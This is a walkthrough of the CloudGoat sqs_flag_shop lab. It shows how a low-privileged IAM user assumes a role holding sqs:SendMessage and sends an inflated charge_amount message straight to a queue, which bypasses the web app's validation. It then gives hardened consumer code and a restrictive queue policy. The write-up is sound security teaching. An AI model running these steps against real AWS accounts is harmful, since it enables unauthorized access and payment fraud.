Cloudgoat-SQS_Flag_Shop

CloudGoat SQS Flag Shop Walkthrough

This CloudGoat walkthrough covers the sqs_flag_shop scenario: a low-privileged IAM user can assume a role that holds sqs:SendMessage on the shop's charging queue, and writing to that queue directly bypasses the input validation the web application performs. We'll use CloudTap, an AWS security testing tool, to automate the enumeration and the role assumption.

Initial Setup and Configuration

First, whitelist your IP address so the scenario's security groups let you reach the CloudGoat resources:

cloudgoat config whitelist --auto

Create the sqs_flag_shop scenario:

cloudgoat create sqs_flag_shop

The setup provides the initial credentials and the target address:

cloudgoat_output_sqsuser_access_key_id = AKIAQ6VKGD5Y2RVBYOH6
cloudgoat_output_sqsuser_secret_key = [REDACTED]
web_site_ip = http://35.153.201.178:5000

Target Analysis

Accessing the web application reveals a shopping website with a coin-based payment system:

Web Application Interface

The application lets users top up their account with coins through a POST request to /charge_cash/<amount>, for example /charge_cash/10. The network traffic shows that only the amounts 1, 5 and 10 are accepted and that each request blocks for several seconds before redirecting back to the index page, which suggests the charge is processed asynchronously rather than in the request handler itself.

Enumeration with CloudTap

CloudTap is an AWS security assessment tool that enumerates the permissions of the current principal, the roles it can assume, and the attack paths that follow from them. Compared with hand-running aws iam and aws sts commands, it gives a quicker overview of an account and can assume discovered roles for you.

Run CloudTap with the sqsuser credentials:

python3 CloudTap.py

The initial reconnaissance with CloudTap reports:

  • Role: cg-sqs-send-message-cgidax1f0hnq4i
  • Permissions on that role: sqs:GetQueueUrl and sqs:SendMessage
  • sqsuser is allowed to assume this role, and CloudTap can perform the assumption automatically

CloudTap Role Assumption

CloudTap assumes the role and the temporary credentials are available as the init profile used in the rest of this walkthrough.

Verify the assumed role identity:

aws sts get-caller-identity --profile init

{
    "UserId": "AROAQ6VKGD5YVZOGE6GS6:SecurityTest-cg-sqs-user-cgidax1f0hnq4i-cg-sqs-send-message-",
    "Account": "065855168369",
    "Arn": "arn:aws:sts::065855168369:assumed-role/cg-sqs-send-message-cgidax1f0hnq4i/SecurityTest-cg-sqs-user-cgidax1f0hnq4i-cg-sqs-send-message-"
}

SQS Queue Discovery

Retrieve the SQS queue URL using the discovered queue name (this is the one call the sqs:GetQueueUrl permission on the role is good for):

aws sqs get-queue-url --queue-name cash_charging_queue --profile init

{
    "QueueUrl": "https://sqs.us-east-1.amazonaws.com/065855168369/cash_charging_queue"
}

Vulnerability Analysis

The page source of the shop contains the charge_cash handler, left behind in an HTML comment:

<!--
@app.route('/charge_cash/<cash>', methods=['POST'])
def charge_cash(cash):
    cash = int(cash)
    if cash==1 or cash==5 or cash==10:
        msg = {"charge_amount" : cash}
        message_body = json.dumps(msg)
        response = sqs.sqs_client.send_message(
            QueueUrl=sqs.sqs_queue_url,
            MessageBody=message_body
        )
        time.sleep(10)
        return redirect(url_for('index'))
    else:
        return "BAD Request!!"
-->

The only check on the charge amount happens here, in the web tier, before the message is put on the queue. Whatever consumes cash_charging_queue trusts the charge_amount in the message body as already validated. Any principal holding sqs:SendMessage on the queue, such as the role we just assumed, can therefore enqueue a body the web application never saw and have it credited as-is.
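The consumer side is not shown on the page, so the following is an added example rather than the scenario's own code. It models the queue consumer as a Lambda handler receiving a standard SQS event batch (an assumption; the scenario's consumer, its storage and the business cap MAX_BALANCE are not documented here) and shows the trusting version beside a hardened one that re-validates every message. The SQS event and its bodies, including the attacker's 100000000 charge from the walkthrough, are constructed inline.

```python
import json

# Allowed top-up amounts, mirroring the web tier's check in charge_cash().
ALLOWED_AMOUNTS = {1, 5, 10}
# Assumed business cap on an account balance; the scenario documents none.
MAX_BALANCE = 1_000_000


def sqs_event(*bodies):
    """Build a constructed SQS event in the shape Lambda receives from an
    event source mapping. Only the fields the handlers read are included."""
    return {
        "Records": [
            {"messageId": f"m{i}", "body": body}
            for i, body in enumerate(bodies, start=1)
        ]
    }


# m1: a legitimate charge produced by the web tier.
# m2: the hand-crafted body sent straight to the queue in the walkthrough.
ATTACK_EVENT = sqs_event(
    json.dumps({"charge_amount": 10}),
    json.dumps({"charge_amount": 100000000}),
)

# Same two messages plus a string-typed amount and a non-JSON body, the kind
# of input a direct sender can inject and the web tier would never produce.
NOISY_EVENT = sqs_event(
    json.dumps({"charge_amount": 10}),
    json.dumps({"charge_amount": 100000000}),
    '{"charge_amount": "10"}',
    "not json",
)


def vulnerable_consumer(event, balance=0):
    """Credits whatever the message says. This is the trust relationship the
    scenario exploits: validation happened in the web tier only, and the
    queue is treated as if only the web tier could write to it."""
    for record in event["Records"]:
        msg = json.loads(record["body"])
        balance += msg["charge_amount"]
    return balance


def hardened_consumer(event, balance=0):
    """Treats the queue as untrusted input, because any principal with
    sqs:SendMessage on it can enqueue bodies the web tier never validated.
    Bad records are rejected and reported rather than raised on, so one
    poison message does not make the whole batch retry forever."""
    applied, rejected = [], []
    for record in event["Records"]:
        mid = record["messageId"]
        try:
            msg = json.loads(record["body"])
        except json.JSONDecodeError:
            rejected.append((mid, "body is not JSON"))
            continue
        amount = msg.get("charge_amount") if isinstance(msg, dict) else None
        # bool is a subclass of int in Python; exclude it explicitly.
        if not isinstance(amount, int) or isinstance(amount, bool):
            rejected.append((mid, "charge_amount is not an integer"))
            continue
        if amount not in ALLOWED_AMOUNTS:
            rejected.append((mid, f"amount {amount} not in {sorted(ALLOWED_AMOUNTS)}"))
            continue
        if balance + amount > MAX_BALANCE:
            rejected.append((mid, "balance cap exceeded"))
            continue
        balance += amount
        applied.append(mid)
    return balance, applied, rejected


if __name__ == "__main__":
    print("vulnerable consumer balance:", vulnerable_consumer(ATTACK_EVENT))
    print("hardened consumer result:", hardened_consumer(NOISY_EVENT))
```

In a real deployment the rejected list would go to a dead-letter queue or an alert: a message with an amount outside {1, 5, 10} arriving on cash_charging_queue cannot have come from charge_cash, so it is direct evidence that someone is writing to the queue.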

Exploitation

Send a message with an inflated charge amount directly to the queue, using the same JSON shape charge_cash produces:

aws sqs send-message --queue-url https://sqs.us-east-1.amazonaws.com/065855168369/cash_charging_queue --message-body '{"charge_amount": 100000000}' --profile init

The consumer picks the message up asynchronously, so give it a few seconds, then refresh the web application to see the inflated coin balance and purchase the flag:

Flag Retrieved

Key Takeaways

This CloudGoat walkthrough demonstrates a few SQS security considerations:

  • A queue is an input boundary: anyone who can send to it bypasses whatever validation the producer performed, so the consumer has to validate messages itself
  • sqs:SendMessage on an application's queue should be granted only to the producer that needs it, enforced both in IAM and in the queue's resource policy; here a role assumable by an ordinary user held it
  • Credentials and roles that look harmless on their own (GetQueueUrl plus SendMessage) can be the whole attack when a trusted consumer sits behind the queue
  • Automated enumeration such as CloudTap's speeds up finding these assumable roles and the permissions they carry
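The queue-side half of the fix, as an added example and not part of the scenario or the original page: a resource policy on cash_charging_queue that allows sqs:SendMessage only to the web application's own role and explicitly denies it to every other principal. The account, region and queue name are the ones from the walkthrough; the role name cg-sqs-web-app-role is a placeholder for whatever role the shop's EC2 instance actually runs under. aws:PrincipalArn evaluates to the IAM role ARN for assumed-role sessions, so the deny also catches sessions of cg-sqs-send-message-cgidax1f0hnq4i even though that role carries an identity-based allow (an explicit deny wins).

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowOnlyTheWebAppToSend",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::065855168369:role/cg-sqs-web-app-role"
      },
      "Action": "sqs:SendMessage",
      "Resource": "arn:aws:sqs:us-east-1:065855168369:cash_charging_queue"
    },
    {
      "Sid": "DenyEveryoneElseSend",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "sqs:SendMessage",
      "Resource": "arn:aws:sqs:us-east-1:065855168369:cash_charging_queue",
      "Condition": {
        "ArnNotEquals": {
          "aws:PrincipalArn": "arn:aws:iam::065855168369:role/cg-sqs-web-app-role"
        }
      }
    }
  ]
}
```

Apply it with aws sqs set-queue-attributes --attributes Policy=<the JSON above> against the queue URL, then re-run the send-message command from the Exploitation section with the init profile: it should now fail with AccessDenied, and the only remaining question for a reviewer is why a user-assumable role was ever granted sqs:SendMessage on this queue in the first place.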